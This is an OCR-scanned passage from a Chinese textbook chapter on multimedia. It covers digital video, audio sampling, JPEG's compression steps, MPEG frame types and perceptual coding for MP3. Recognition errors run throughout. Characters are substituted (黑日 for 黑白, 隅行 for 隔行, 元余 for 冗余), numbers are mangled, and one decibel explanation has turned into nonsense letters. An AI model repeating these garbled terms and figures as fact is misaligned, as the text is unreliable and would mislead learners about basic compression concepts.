和 两 个 色 度 (chrominance) 信号 ， 但 是 不 同 的 制式 使 用 不 同 的 系数 从 
RGB 信号 构造 这 些 信号 。 说 来 也 奇怪 ， 人 的 眼睛 对 亮度 信号 比 对 色 度 
信号 敏感 得 多 ， 故 色 度 信号 倒 不 必 非 要 精确 地 进行 传输 。 因 此 ， 亮 度 
信和 号 应 该 用 与 旧 的 黑 日 信号 相同 的 频率 进行 广播 ， 从 而 使 其 可 以 被 黑 
日 电视 机 接收 。 两 个 色 度 信号 则 可 以 以 更 高 的 频率 用 较 罕 的 波段 进行 
广播 。 某 些 电视 机 有 标 着 亮度 、 色 调和 饱和 度 《或 者 是 亮度 、 色 彩 和 


颜色 ) 字样 的 旋钮 或 调节 装置 ， 可 以 分 别 控制 这 三 个 信号 。 理 解 亮 度 
和 色 度 对 于 理解 视频 压缩 的 工作 原理 是 十 分 必要 的 。 


到 目前 为 止 我 们 介绍 的 部 是 模拟 视频 ， 现 在 让 我 们 转 同 数 子 视 
频 。 数 字 视 频 最 简单 的 表示 方法 是 帧 的 序列 ， 每 一 帧 由 呈 和 矩形 栅 格 的 
图 像 要 素 即 像素 (pixel) 组 成 。 对 于 彩色 视频 ， 每 一 像素 RGB 三 色 中 
的 每 种 颜色 用 8 个 二 进 制 位 来 表示 ， 这 样 可 以 表示 2“ s1600 万 种 不 同 的 
颜色 ， 已 经 足够 了 。 人 的 眼睛 没有 能 力 区 分 这 么 多 颜色 ， 更 不 用 说 更 
多 的 颜色 了 。 


要 产生 平滑 的 运动 效果 ， 数 子 视频 像 模 拟 视频 一 样 必须 每 秒 至 少 
显示 25 帧 。 然 而 ， 由 于 高 质量 的 计算 机 显示 器 通 常用 存放 在 视频 RAM 
中 的 图 像 每 秒 钟 扫 搬 屏幕 75 次 或 更 多 次 ， 隅 行 扫描 十 不 必要 的 ， 因 此 
所 有 计算 机 显示 器 都 采用 逐 行 扫描 。 仅 仅 连 续 刷 新 〈 也 就 是 重 绘 ) 相 
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征 由 每 秒 刷新 屏幕 的 次 数 决定 的 。 这 两 个 参数 是 不 同 的 。 一 幅 静 止 的 
图 像 以 每 秒 20 帧 的 频率 显示 不 会 表现 出 断断续续 的 运动 ， 但 是 却 会 出 
现 内 烁 ， 因 为 当 一 帧 画面 在 视网膜 上 消退 时 下 一 帧 还 没有 出 现 。 一 部 
电影 每 秒 有 20 个 不 同 的 帧 ， 在 80 Hz 的 刷新 率 下 每 一 帧 将 连续 绘制 4 
次 ， 这 样 不 会 出 现 内 烁 ， 但 是 运动 将 是 断断续续 的 。 


当 我 们 考虑 在 网 络 上 传输 数字 视频 所 需要 的 带宽 时 ， 这 两 个 参数 
的 重要 性 就 十 分 清楚 了 。 目 前 许多 计算 机 显示 器 都 采用 4:3 的 纵横 比 ， 
所 以 可 以 使 用 便宜 的 并 且 大 量 生产 的 显像管 ， 这 样 的 显像管 本 来 是 为 
电视 市 场 的 消费 者 设计 的 。 显 示 器 常用 的 配置 有 640x480 (VGA) ` 
800x600 (SVGA) 、1024x768 (XGA) 以 及 1600x1200 (UXGA) 。 


每 像素 24 位 的 UXGA 显 示 以 及 25 帧 / 秒 ， 需 要 1.2Gbps 的 带宽 ， 即 使 VGA 
显示 也 需要 184Mbps。 将 这 些 速率 加 倍 以 避免 闪烁 是 没有 吸引 力 的 ， 更 
好 的 解决 方案 是 每 秒 传输 25 帧 ， 同 时 让 计算 机 保存 每 一 帧 并 将 其 绘制 
两 次 。 广 播 方式 的 电视 没有 使 用 这 一 策略 ， 因 为 电视 机 没有 存储 器 ， 
并 且 模 拟 信号 如 果 不 首 移 转换 成 数字 形式 无 论 如 何 也 无 法 存放 在 RAM 
中 ， 而 模 数 转换 则 需要 额外 的 硬件 。 因 此 ， 陋 行 扫描 对 于 广播 方式 的 
电视 而 言 是 需要 的 ， 但 是 对 数字 视频 则 不 需要 。 


7.2.2 EMm 


音频 ( 声 首 ) 波 是 一 维 的 声 UE) 波 。 当 声波 进入 人 耳 的 时 候 ， 
到 膜 将 振动 ， 导 致 内 耳 的 小 骨 随 之 振动 ， 将 神经 脉冲 送 入 大 脑 ， 这 些 
脉冲 被 收听 者 感知 为 声音 。 类 似 地 ， 当 声波 冲击 麦 元 风 的 时 候 ， 麦 克 
风 将 产生 电信 号 ， 将 声音 的 振幅 表示 为 时 间 的 函数 。 


人 耳 可 以 听 到 的 声音 的 频率 范围 从 20 Hz 到 20 000Hz， 而 某 些 动 
物 ， 特 别 是 狗 ， 能 够 听 到 更 高 频率 的 声音 。 耳 条 是 以 对 数 规律 听 声 音 
的 ， 所 以 两 个 振幅 为 A 和 B 的 声音 的 比率 习惯 以 dB 〈 分 贝 ) 为 单位 来 表 


dB=20 log,, (A/B) 


如 果 我 们 定义 1 kHz EAI AT YT EAT BBR (压力 大 约 为 0.0003 
dyne/em* ) NOdB, ALAA HIRIGAZ ASO dB， 而 使 人 感到 痛 否 的 闭 
值 大 约 为 120 dB， 动 态 范 围 为 一 百 万 量 级 。 为 避免 混淆 ， 上 面 公式 中 
的 A 和 B 是 振幅 。 如 琳 我 们 使 用 的 十 功率 水 平 ， 则 上 面 公式 中 对 数 前 面 
的 系数 应 该 为 10， 而 不 是 20， 因 为 功率 与 振幅 的 平方 成 正比 。 


音频 波 可 以 通过 模 数 转换 器 (Analog Digital Converter, ADC) 转 
换 成 数字 形式 。ADC 以 电压 作为 输入 ， 并 且 生 成 二 进 制 数 作为 输出 。 
图 7-5a 中 为 一 个 正弦 波 的 例子 。 为 了 数字 化 地 表示 该 信和 号， 我们 可 以 每 


隔 AT 秒 对 其 进行 采样 ， 如 图 7-5b 中 的 条 棒 高 度 所 示 。 如 果 一 个 声波 不 
是 纯粹 的 正 粥 波 ， 而 是 正弦 波 的 线性 奢 加 ， 其 中 存在 的 最 高 频率 成 分 
为 f， 那 么 以 2f 的 频率 进行 采样 就 足够 了 。1924 年 贝尔 实验 室 的 一 位 物 
理学 家 Harry Nyquist 从 数学 上 证 明了 这 一 结果 ， 这 就 是 著名 的 Nyquist 
抽样 定理 。 更 多 地 进行 采样 是 没有 价值 的 ， 因 为 如 此 采样 可 以 检测 到 
的 更 高 的 频率 并 不 存在 。 


图 7-5 aED; b) 对 正弦 波 进行 采样 ，c) 对 样本 进行 4 位 量化 


数字 样本 是 不 准确 的 。 图 7-5c 中 的 样本 只 允许 9 个 值 ， 从 -1.00 到 
1.00， 步 长 为 0.25， 因 此 ， 需 要 4 个 二 进 制 位 来 表示 它们 。8 位 样本 可 以 
有 256 个 不 同 的 值 ，16 位 样本 可 以 有 65 536 个 不 同 的 值 。 由 于 每 一 样本 
的 位 数 有 限 而 引入 的 误差 称 为 量化 噪声 (quantization noise) 。 如 果 量 


化 噪声 太 大 ， 耳 条 就 会 感觉 到 。 


对 声音 进行 采样 的 两 个 著名 的 例子 是 电话 和 音频 CD。 电 话 系统 使 
用 的 是 脉冲 编码 调制 (pulse code modulation) ， 脉 冲 编码 调制 每 秒 以 7 


位 (北美 和 日 本 ) 或 8 位 (IN) 对 声音 采样 8000 次 ， 故 这 一 系统 的 数 
据 率 为 56 000 bps 或 64 000 bps。 由 于 每 秒 只 有 8000 个 样本 ， 所 以 4 kHz 
以 上 的 频率 就 丢失 了 。 


音频 CD 是 以 每 秒 44 100 个 样本 的 采样 率 进行 数字 化 的 ， 足 以 捕获 
最 高 达到 22 050 Hz 的 频率 ， 这 对 于 人 而 言 是 很 好 的 ， 但 是 对 于 狗 而 襄 
却 是 很 差 的 。 每 一 样本 在 其 振幅 范围 内 以 16 位 进行 线性 量化 。 注 意 ， 
16 位 样本 只 有 65 536 个 不 同 的 值 ， 而 人 耳 以 最 小 可 听 度 为 步 长 进行 测量 
时 的 动态 范围 大 约 为 一 百 万 。 所 以 每 个 样本 只 有 16 位 引入 了 某 些 量化 
噪声 〈 尽 管 没 有 履 盖 全 部 动态 范围 ， 但 是 人 们 并 不 认为 CD 的 质量 受到 
mE) 。 以 每 秒 44 100 个 样本 、 每 个 样本 16 位 计算 ， 音 频 CD 需 要 的 带 
宽 单 声 道 为 705.6 Kbps， 立 体 声 为 1.411 Mbps (参见 图 7-2) 。 音 频 压 缩 
也 许 要 以 描述 人 类 听觉 如 何 工作 的 心理 声学 模型 为 基础 。 使 用 MPEG 第 
3 层 (MP3) 系统 进行 10 倍 的 压缩 是 可 能 的 。 采 用 这 一 格式 的 便携 式 音 
乐 播 放 器 近年 来 已 经 十 分 普遍 。 


数字 化 的 声音 可 以 十 分 容易 地 在 计算 机 上 用 软件 进行 处 理 。 有 许 
许多 多 的 个 人 计算 机 程序 可 以 让 用 户 从 多 个 信号 源 记 录 、 显 示 、 编 
辑 、 混 合 和 存储 声波 。 事 实 上 ， 所 有 专业 的 声 首 记录 与 编辑 系统 如 今 
都 是 数字 化 的 。 模 拟 方式 基本 上 过 时 了 。 


7.3 ”视频 压缩 


现在 我 们 已 经 十 分 清楚 ， 以 非 压 缩 格 式 处 理 多 媒体 信息 是 完全 不 
可 能 的 一 一 它 的 数据 量 太 大 了 ， 人 惟一 的 希望 是 有 可 能 进行 大 比例 的 数 
据 压 缩 。 笠 运 的 是 ， 在 过 去 几 十 年 ， 大 量 的 研究 群体 已 经 发 明了 许多 
压缩 技术 和 算法 ， 使 多 媒体 传输 成 为 可 能 。 在 下 面 几 市 中 ， 我 们 将 研 
究 一 些 多 媒体 数据 (特别 是 图 像 ， 的 压缩 方法 ， 更 多 的 细 市 请 参见 
(Fluckiger,1995; Steinmetz#llNahrstedt,1995) ° 


所 有 的 压缩 系统 都 需要 两 个 算法 : 一 个 用 于 在 源 端 对 数据 进行 压 
缩 ， 男 一 个 用 于 在 目的 端 对 数据 进行 解压 缩 。 在 文献 中 ， 这 两 个 算法 
分 别 被 称 为 编码 (encoding) 算法 和 解码 (decoding) 算法 ， 我 们 在 本 
书 中 也 使 用 这 样 的 术语 。 


这 些 算法 具有 某 些 不 对 称 性 ， 这 一 不 对 称 性 对 于 理解 数据 压缩 古 
十 分 重要 的 。 首 先 ， 对 于 许多 应 用 而 言 ， 一 个 多 媒体 文档 eimi 
部 电影 ) 只 需要 编码 一 次 〈 当 该 文档 存储 在 多 媒体 服务 右上 时 ) ， 但 
征 需要 解码 数 千 次 〈 当 该 文档 被 客户 观看 时 ) 。 这 一 不 对 称 性 意味 
着 ， 假 知 解码 算法 速度 快 并 且 不 需要 昂 贯 的 硬件 ， 那 么 编码 算法 速度 
慢 并 且 需 要 昂贵 的 硬件 也 是 可 以 接受 的 。 从 男 一 方面 来 说 ， 对 于 诸如 
视频 会 议 这 样 的 实时 多 媒体 而 言 ， 编 码 速 度 慢 是 不 可 接受 的 ， 在 这 样 
的 场合 ， 编 码 必须 即时 完成 。 


第 二 个 不 对 称 性 是 编码 /解码 过 程 不 必 是 100% 可 逆 的 。 也 就 是 说 ， 
当 对 一 个 文件 进行 压缩 并 进行 传输 ， 然 后 对 其 进行 解压 缩 时 ， 用 户 可 
以 期 望 取 回 原始 的 文件 ， 准 确 到 最 后 一 位 。 对 于 多 媒体 ， 这 样 的 要 求 
是 不 存在 的 。 视 频 信 号 经 过 编码 和 解码 之 后 与 原始 信号 只 存在 轻微 的 
过 异 通 节 束 生 可 以 接受 的 。 当 解码 输出 不 与 原始 输入 挛 格 相 等 时 ， 系 
统 个 称 为 是 有 损 的 (lossy) 。 所 有 用 于 多 媒体 的 压缩 系统 都 是 有 损 
的 ， 因 为 这 样 可 以 获得 更 好 的 压缩 效果 。 


7.3.1 JPEG 标 准 


用 于 压缩 连续 色调 静止 图 像 (例如 照片 ， 的 JPEG (Joint 
Photographic Experts Group， 联 合 摄 影 专家 组 ) 标准 是 由 摄影 专家 在 
ITU、ISO 和 IEC 等 其 他 标准 组 织 的 支持 下 开发 出 来 的 。JPEG 标 准 对 于 
多 媒体 而 言 是 十 分 重要 的 ， 因 为 用 于 压缩 运动 图 像 的 标准 MPEG 不 过 是 
分 别 对 每 一 帧 进行 JPEG 编 码 ， 再 加 上 某 些 帧 间 压 缩 和 运动 补偿 等 额外 
的 特征 。JPEG 定 义 在 10918 号 国际 标准 中 。 它 具有 4 种 模式 和 许多 选 
项 ， 但 是 我 们 在 这 里 只 关心 用 于 24 位 RGB 视频 的 方法 ， 并 且 省 略 了 许 
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用 JPEG 对 一 幅 图 像 进行 编码 的 第 一 步 是 块 预 制 。 为 明确 起 见 ， 我 
们 假设 JPEG 输 入 是 一 幅 640x480 的 RGB 图 像 ， 每 个 像素 24 位 ， 如 图 7-6a 
所 示 。 由 于 使 用 亮度 和 色 度 可 以 获得 更 好 的 压缩 效果 ， 所 以 从 RGB 值 


中 计算 出 一 个 亮度 信号 和 两 个 色 度 信号 ， 对 于 NTSC 制 式 ， 分 别 将 其 记 
作 Y、I 和 Q， 对 于 PAL 制 式 ， 分 别 将 其 记 作 Y、U 和 V， 两 种 制式 的 计算 
公式 是 不 同 的 。 下 面 我 们 将 使 用 NTSC 的 符号 ， 但 是 压缩 算法 是 相同 
的 。 


对 Y、I 和 Q 构 造 不 同 的 矩阵， 每 个 矩阵 其 元 素 的 取 值 范围 在 0 到 255 
之 间 。 接 下 来 ， 在 I 和 Q 和 矩阵 中 对 由 4 个 元 素 组 成 的 方块 进行 平均 ， 将 算 
阵 缩 小 至 320x240。 这 一 缩小 是 有 损 的 ， 但 是 眼睛 几乎 注意 不 到 ， 因 为 
眼睛 对 亮度 比 对 色 度 更 加 敏感 ， 然 而 这 样 做 的 结果 是 将 数据 压缩 了 2 
倍 。 现 在 将 所 有 三 个 矩阵 的 每 个 元 素 减 去 128， 从 而 将 0 置 于 取 值 范围 
的 中 间 。 最 后 将 每 个 矩阵 划分 成 gx8 的 块 ，Y 和 矩阵 有 4800 块 ， 其 他 两 个 
和 矩阵 每 个 有 1200 块 ， 如 图 7-6b 所 示 。 
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图 7-6 a)RGB 输 入 数据 ; b) 块 预制 之 后 


JPEG 的 第 2 步 是 分 别 对 7200 块 中 的 每 一 块 应 用 DCT (离散 余弦 变 
。 每 一 DCT 的 输出 是 一 个 8x8 的 DCT 系 数 和 矩阵 。DCT 和 矩阵 的 (0,0) 


换 ) 
一 空间 频率 存在 多 大 的 谱 功 率 。 


元 素 旦 块 的 平均 值 ， 其 他 元 素 表 明 每 
对 于 熟悉 伟 立 叶 变换 的 读者 而 言 ，DCT 则 是 一 种 二 维 的 空间 伟 立 叶 变 
换 。 在 理论 上 ，DCT 是 无 损 的 ， 但 是 在 实践 中 由 于 使 用 浮 点 数 和 超越 
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素 随 着 到 (0,0) 元 素 距离 的 增加 而 迅速 衰减 ， 如 图 7-7b 所 示 。 
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Al 7-7 alY 和 矩阵 的 一 块 ， b)DCT 系 数 


DCT 完 成 之 后 ，JPEG 进 入 到 第 3 步 ， 称 为 量化 (quantization) ， 在 


量化 过 程 中 不 重要 的 DCT 系 数 将 被 去 除 。 这 一 (有 损 ) 变换 是 通过 将 
8x8 DCT 短 阵 中 的 每 个 元 素 除 以 取 目 一 张 表 中 的 权 值 而 实现 的 。 如 来 所 
有 权 值 都 是 1， 那 么 该 变换 将 不 做 任何 事情 。 然 而 ， 如 果 权 值 随 着 离 原 
点 的 距离 而 急剧 增加 ， 那 么 较 高 的 空间 频率 将 迅速 衰落 。 


图 7-8 给 出 了 这 一 步 的 一 个 例 于 ， 在 图 7-8 中 我 们 可 以 看 到 初始 DCT 
和 矩阵、 量化 表 和 通过 将 每 个 DCT 元 素 除 以 相应 量化 表 元 素 所 获得 的 结 
果 。 量 化 表 中 的 值 不 是 JPEG 标 准 的 一 部 分 。 每 一 应 用 必须 提供 自己 的 
量化 表 ， 这 样 束 给 应 用 以 控制 日 映 压 缩 损失 权衡 的 能 
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量化 表 


DCT 系 数 
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Al 7-8 量化 DCT 系 数 的 计算 


第 4 步 通 过 将 每 一 块 的 (0,0) E (左上 角 元 素 ) 以 它 与 前 一 块 中 相 
应 元 素 相 差 的 量 蔡 换 而 减 小 。 由 于 这 些 元 素 是 各 目 所 在 块 的 平均 ， 它 
们 应 该 变化 得 比较 缓慢 ， 所 以 采用 差 值 可 以 将 这 些 元 素 中 的 大 部 分 缩 


减 为 较 小 的 值 。 对 于 其 他 元 素 不 计算 差 值 。 (0,0) 值 称 为 DC 分 量 ， 其 


他 值 称 为 AC 分 量 。 


第 5 步 是 将 64 个 元 素 线性 化 并 且 对 线性 化 得 到 的 列表 进行 行程 长 度 
编码 。 从 左 到 右 然后 从 上 到 下 地 对 块 进行 扫描 不 能 将 零 集中 在 一 起 ， 
所 以 采用 了 2Z 字 形 的 扫描 模式 ， 如 图 7-9 所 示 。 在 本 例 中 ，Z 字 形 模式 最 
终 在 矩阵 的 尾部 产生 了 38 个 连续 的 0， 这 一 串 0 可 以 缩减 为 一 个 计数 表 


明 有 38 个 0。 


图 7-9 量化 值 传送 的 顺序 


现在 我 们 得 到 一 个 代表 图 像 的 数字 列表 (在 变换 空间 中 ) ， 第 6 步 
将 采用 Huffman 编 码 对 列表 中 的 数字 进行 编码 以 用 于 存储 或 传输 。 


JPEG 看 来 似乎 十 分 复 洒 ， 这 是 因为 它 确 实 很 复杂 。 尺 管 如 此 ， 由 
于 它 通 季 可 以 获得 20:1 或 更 好 的 压缩 效 末 ， 所 以 获得 广泛 的 应 用 。 解码 
一 幅 JPEG 图 像 需 要 反 过 来 运行 上 述 算法 。JPEG 大 体 上 是 对 称 的 ， 解码 
一 幅 图 像 花 费 的 时 间 与 编码 基本 相同 。 


7.3.2 MPEG 标准 


最 后 ， 我 们 讨论 问题 的 核心 : MPEG (Motion Picture Experts 
Group， 运 动 图 像 专家 组 ) 标准 。 这 是 用 于 压缩 视频 的 主要 算法 ， 并 于 
1993 年 成 为 国际 标准 。MPEG-1 (第 11172 号 国际 标准 ) 设计 用 于 视频 
录像 机 质量 的 输出 (对 NTSC 制 式 为 352x240) ， 它 使 用 的 位 率 为 1.2 
Mbps ° MPEG-2 (第 13818 号 国际 标准 ) 设计 用 于 将 广播 质量 的 视频 压 
缩 至 4 Mbps 到 6 Mbps， 这 样 束 可 以 适应 NTSC 或 PAL 制 式 的 广播 频道 。 


MPEG 的 两 个 版 本 均 利 用 了 在 电影 中 存在 的 两 类 元 余 : 空间 见 余 和 
时 间 宛 余 。 空 间 宛 余 可 以 通过 简单 地 用 JPEG 分 别 对 每 一 帧 进行 编码 而 
得 到 利用 。 互 相连 续 的 帧 常常 几乎 是 完全 相同 的 ， 这 就 是 时 间 和 元 余 ， 
利用 这 一 事实 可 以 达到 额外 的 压缩 效果 。 数 字 便 携 式 摄像 机 使 用 的 数 
字 视 频 (Digital Video, DV) 系统 只 使 用 类 JPEG 的 方案 ， 这 是 因为 只 
单独 对 每 一 帧 进行 编码 可 以 达到 更 快 的 速度 ， 从 而 使 编码 可 以 实时 完 
成 。 这 一 论断 的 因果 关系 可 以 从 图 7-2 看 出 : 尽管 数字 便携 式 摄像 机 与 
未 压缩 电视 相 比 具有 较 低 的 数据 率 ， 但 是 却 远 不 及 MPEG-2。 (为 了 使 
比较 公平 ， 请 注意 DV 便 携 式 摄像 机 以 8 位 对 亮度 、 以 2 位 对 每 一 色 度 进 
行 采样 ， 使 用 类 JPEG 编 码 仍 然 存 在 5 倍 的 压缩 率 。) 


对 于 摄像 机 和 青 景 绝对 静止 ， 而 有 一 两 个 党 员 在 四 周 缓慢 移动 的 
场景 而 言 ， 帧 与 帧 之 间 几 乎 所 有 的 像素 都 古 相 同 的 。 此 时 ， 仪 仅 将 每 


帧 减 去 前 一 帧 并 且 在 差 值 图 像 上 运行 JPEG 就 相当 不 错 。 然 而 ， 对 于 
摇动 或 缩放 摄像 机 镜头 的 场景 而 言 ， 这 一 技术 将 变 得 非常 糟糕 。 此 时 
需要 某 种 方法 对 这 一 运动 进行 补偿 ， 这 正 是 MPEG 要 做 的 事情 ; 实际 
上 ， 这 就 是 MPEG 和 JPEG 之 间 的 主要 差别 。 


MPEG-2 输 出 由 三 种 不 同 的 帧 组 成 ， 观 看 程序 必须 对 它们 进行 处 
理 ， 这 三 种 帧 为 : 


Ibi: 自 包 含 的 JPEG 编 码 静 止 图 像 。 
DPI: 与 上 一 帧 逐 块 的 差 。 
3)B 帧 : 与 上 一 帧 和 下 一 帧 的 关 。 


I 帧 只 是 用 JPEG 编 码 的 静止 图 像 ， 沿 着 每 一 轴 还 使 用 了 全 分 辨 率 的 
亮度 和 半分 辨 率 的 色 度 。 在 输出 流 中 使 项 周期 性 地 出 现 是 十 分 必要 
的 ， 其 原因 有 三 。 首 先 ，MPEG 可 以 用 于 电视 广播 ， 而 观众 收看 是 随意 
的 。 如 琳 所 有 的 帧 都 依赖 于 其 前 驱 直 到 第 一 帜 ， 那 么 错过 了 第 一 巾 的 
人 束 再 也 无 法 对 随后 的 帧 进行 解码 ， 这 样 使 观众 在 电影 开始 之 后 束 不 
能 再 进行 收看 。 第 二 ， 如 采 任 何 一 帧 在 接收 时 出 现 错误 ， 那 么 进一步 
的 解码 束 不 可 能 再 进行 。 第 三 ， 没 有 I 帧 ， 在 进行 快 进 或 倒 市 时 ， 人 解码 
器 将 不 得 不 计算 经 过 的 每 一 帧 ， 只 有 这 样 才 能 知道 快 进 或 倒 带 停止 时 
帧 的 全 部 值 。 有 了 其， 就 可 以 疝 前 或 同 后 跳 过 大 干 帧 直到 找到 一 个 由 
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次 或 两 次 。 


与 此 相对 照 ，P 帧 是 对 帧 间 差 进行 编码 。P 帧 基于 宏 块 
(macroblock) 的 思想 ， 宏 块 履 盖 亮 度 空间 中 16x16 个 像素 和 人 色 度 空间 
中 8x8 个 像素 。 通 过 在 前 一 帧 中 搜索 宏 块 或 者 与 其 只 存在 轻微 差异 的 宏 
块 实现 对 一 个 宏 块 的 编码 。 


P 帧 的 用 途 在 图 7-10 所 示 的 例子 中 可 以 看 出 。 在 图 7-10 中 我 们 看 到 
三 个 连续 的 帧 具有 相同 的 背景 ， 但 是 在 一 个 人 所 在 的 位 置 上 存在 差 
异 。 对 于 摄像 机 固定 在 三 脚 架 上 ， 而 演员 在 摄像 机 面前 活动 的 情形 
中 ， 这 种 场景 是 常见 的 。 包 含 背 景 的 宏 块 是 严格 匹配 的 ， 但 是 包含 人 
的 宏 块 在 位 置 上 存在 某 一 未 知 数量 的 偏 移 ， 编 码 时 必须 追踪 到 前 一 帧 
中 相应 的 宏 块 。 


图 7-10 三 个 连续 的 视频 帧 


MPEG 标 准 没有 规定 如 何 搜 索 、 搜 索 多 远 以 及 如 何 计算 一 个 匹配 的 
好 坏 ， 这 些 都 留 给 每 一 具体 的 实现 。 例 如 ， 一 种 实现 可 能 在 前 一 帧 中 


的 当前 位 置 以 及 所 有 在 x 方 向 偏 移 +Ax、 在 y 方 向 偏 移 +Ay 的 位 置 搜索 一 
个 宏 块 。 对 于 每 个 位 置 ， 可 以 计算 出 亮度 矩阵 中 匹配 的 数目 。 具 有 最 
高 得 分 的 位 置 将 成 为 获胜 者 ， 只 要 其 得 分 高 于 某 一 预 设 的 靖 值 。 否 
则 ， 安 块 王 被 称 为 失 配 。 当 然 ， 更 复杂 的 算法 也 是 可 能 的 。 


如 采 一 个 宏 块 被 找到 ， 则 通过 以 其 值 与 前 一 帧 中 的 值 求 差 对 其 进 
行 编码 (针对 亮度 和 两 个 色 度 ) ， 然 后 ， 对 这 些 差 值 矩阵 进行 JPEG 编 
码 。 输 出 流 中 安 块 的 值 是 运动 天 量 ( 宏 块 在 每 一 方向 从 其 前 一 位 置 移 
动 多 远 的 距离 ) ， 随 后 是 以 JPEG 进 行 编码 的 与 前 一 帧 的 差 值 。 如 果 宏 
块 在 前 一 帧 中 查找 不 到 ， 则 当前 值 以 JPEG 进 行 编码 ， 如 同 在 I 巾 中 一 
样 。 


B 帧 与 P 帧 相关 似 ， 不 同 的 是 它 允 许 参 考 安 块 既 可 以 在 前 一 帧 中 ， 
也 可 以 在 后 续 的 帧 中 ， 既 可 以 在 I 帧 中 ， 也 可 以 在 P 帧 中 。 这 一 额外 的 
自由 可 以 改进 运动 补偿 ， 并 且 在 物体 从 前 面 (或 后 面 ) 经 过 其 他 物体 
时 非常 有 用 。 例 如 ， 在 一 场 垒 球 比赛 中 ， 当 三 垒 手 将 球 毛 向 一 垒 时 ， 
可 能 存在 某 些 帧 其 中 垒球 让 蔽 了 在 背景 中 移动 的 二 垒 手 的 头 部 。 在 下 
一 帧 中 ， 二 人 垒 手 的 头 部 可 能 在 垒球 的 左面 有 一 部 分 可 见 ， 头 部 的 下 一 
个 近似 可 以 从 垒球 已 经 通过 了 头 部 的 后 续 的 帧 中 导出 。B 帧 允许 一 个 帧 
基于 未 来 的 帧 。 


要 进行 B 帧 编码 ， 编 码 器 需要 在 内 存 中 同时 保存 三 个 解码 的 帧 ， 过 
去 的 一 帜 、 当 前 的 一 帆 和 未 来 的 一 帆 。 为 了 人 简化 解码 ， 各 帆 必 须 以 依 


赖 的 顺序 而 不 是 以 显示 的 顺序 出 现在 MPEG 流 中 。 因 而 ， 当 一 段 视频 通 
过 网 络 被 观看 时 ， 即 使 有 完美 的 定时 ， 在 用 户 的 机 器 上 也 需要 进行 缓 
冲 ， 对 帧 进行 记录 以 便 正 党 地 显示 。 由 于 这 一 依赖 顺序 和 显示 顺序 间 
的 差异 ， 试 图 反 向 播放 一 部 电影 而 没有 相当 可 观 的 缓冲 和 复杂 的 算法 
征 无 法 工作 的 。 


有 许多 动作 以 及 快速 剪 切 (比如 战争 电影 的 电影 需要 许多 I 型 
帧 。 而 那 种 在 导演 对 准 了 摄像 机 之 后 便 出 去 哆 咖啡 ,只 留 下 演员 至 
词 (比如 爱情 故事 ) 的 电影 ， 就 可 以 使 用 长 段 的 P 帧 与 B 帧 ， 而 这 两 种 
帧 结构 与 帧 相 比 使 用 很 少 的 存储 空间 。 从 磁盘 效率 的 角度 来 看 ， 
运 宫 多 媒体 服务 的 公司 应 该 洗 试 得 到 尺 可 能 多 的 女性 消费 群体 。 


就 像 我 们 刚刚 看 到 的 ，CD 品 质 的 音频 需要 一 个 1.411 Mbps 带 宽 的 
传送 。 很 清楚 ， 在 Intermet 的 实际 传送 中 ， 需 要 有 效 的 压缩 。 正 是 因为 
这 一 点 ， 已 经 发 展 起 来 许多 不 同 的 音频 压缩 算法 。 或 许 最 流行 的 算法 
是 拥有 三 个 层 (SA) 的 MPEG 音 频 ， 其 中 ，MP3(MPEG 音 频 层 3) 是 功 
能 最 强大 也 是 最 出 名 的 。 在 Internet 上 随处 可 见 大 量 MP3 格 式 的 音乐 ， 
它们 并 非 都 合法 ， 因 此 引发 了 许多 来 自 艺 术 家 与 版 权 拥有 者 的 案件 。 
MP3 属 于 MPEG 视 频 压缩 标准 里 的 音频 部 分 。 


首 频 压缩 可 以 用 两 种 方法 完成 。 在 波形 编码 技术 中 ， 信 与 通过 传 
立 叶 变换 (Fourier transform) 变换 成 频率 分 量 。 图 7-11 给 出 一 个 时 间 与 
它 最 初 的 15 个 傅立叶 振幅 的 实例 函数 。 然 后 每 一 个 分 量 的 振幅 用 最 简 
短 的 方法 编码 。 目标 是 在 另 一 端 用 尽 可 能 少 的 二 进 制 位 精确 地 重建 其 
BE ° 
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始 信号 


另 一 种 方法 是 感知 编码 ， 这 种 撤 术 是 在 人 类 听觉 系统 中 寻找 某 种 
细 纹 ， 用 来 对 信和 号 编码 ， 这 种 信号 听 起 来 气 人 的 正音 收 听 相 同 ， 尽 管 
在 示波器 上 看 起 来 却 大 相 径 庭 。 感 知 编码 是 基于 心理 声学 的 一 一 人 们 
如 何 感知 声音 的 科学 。MP3 正 是 基于 感知 编码 。 


感知 编码 的 关键 特性 在 于 一 些 声音 可 以 掩盖 住 其 他 声音 。 想 象 在 
个 温暖 夏天 举办 的 现场 直播 的 长 笛 音 乐 会 ， 突 然则， 附近 的 一 群 工 
人 打开 他 们 的 风 匀 开 始 挖掘 街道 。 这 时 没有 人 可 以 再 听 到 侍 子 的 声 
首 ， 因 为 它 已 经 被 风 销 的 声音 给 掩盖 了 。 从 传送 角度 看 ， 只 编码 风 销 
的 频段 束 足 够 了 ， 因 为 听众 无 论 如 何 都 听 不 到 笛子 的 声音 。 这 种 技术 
就 叫做 频段 屏蔽 一 一 在 一 个 频段 里 响亮 的 声音 掩盖 住 另 一 频段 中 较 柔 
和 声音 的 能 力 ， 这 种 较 柔 和 声 首 只 有 在 没有 啊 膨 声 首 时 才 可 以 听 到 。 
事实 上 ， 即 使 风 销 停止 工作 ， 在 一 个 短 时 间 内 季子 的 声音 也 很 难 再 被 
听 到 ， 因 为 耳 术 在 开始 工作 时 已 经 调 低 了 增益 ， 并 且 需 要 在 一 段 时 间 
之 后 才 会 再 次 调 高 增益 。 这 种 效果 称 为 芹 时 屏蔽 。 


为 了 使 得 这 些 影响 能 尽量 被 量化 ， 设 想 实 验 1。 某 个 人 在 一 间 安 葵 
的 屋子 里 戴 着 与 计算 机 声卡 相连 的 耳机 。 计 算 机 产生 最 低 100Hz 但 功率 
逐渐 增加 的 纯正 弦 波 。 这 个 人 被 命令 在 他 /她 听 到 一 个 首 调 的 时 候 融 击 
一 个 键 。 计 算 机 在 记录 当前 功率 级 之 后 ， 以 200Hz、300hz 以 及 其 他 所 


有 不 超过 人 类 听力 极限 的 频率 重复 之 前 的 实验 。 在 把 许多 实验 者 的 实 
验 平 均值 计算 出 来 后 ， 一 张 关 于 “需要 多 大 功率 才能 使 人 们 听 到 一 个 音 
调 ” 的 对 数 -对 数 图 就 展现 出 来 了 ， 如 图 7-12a 所 示 。 图 中 曲线 的 给 出 直 
接 结果 是 :人 们 并 没有 必要 对 那些 功率 在 可 听 阐 值 之 下 的 频率 编码 。 
例如 ， 在 图 7-12a 中 ， 如 果 100Hz 的 功率 是 204B， 那 么 在 输出 上 残 可 以 
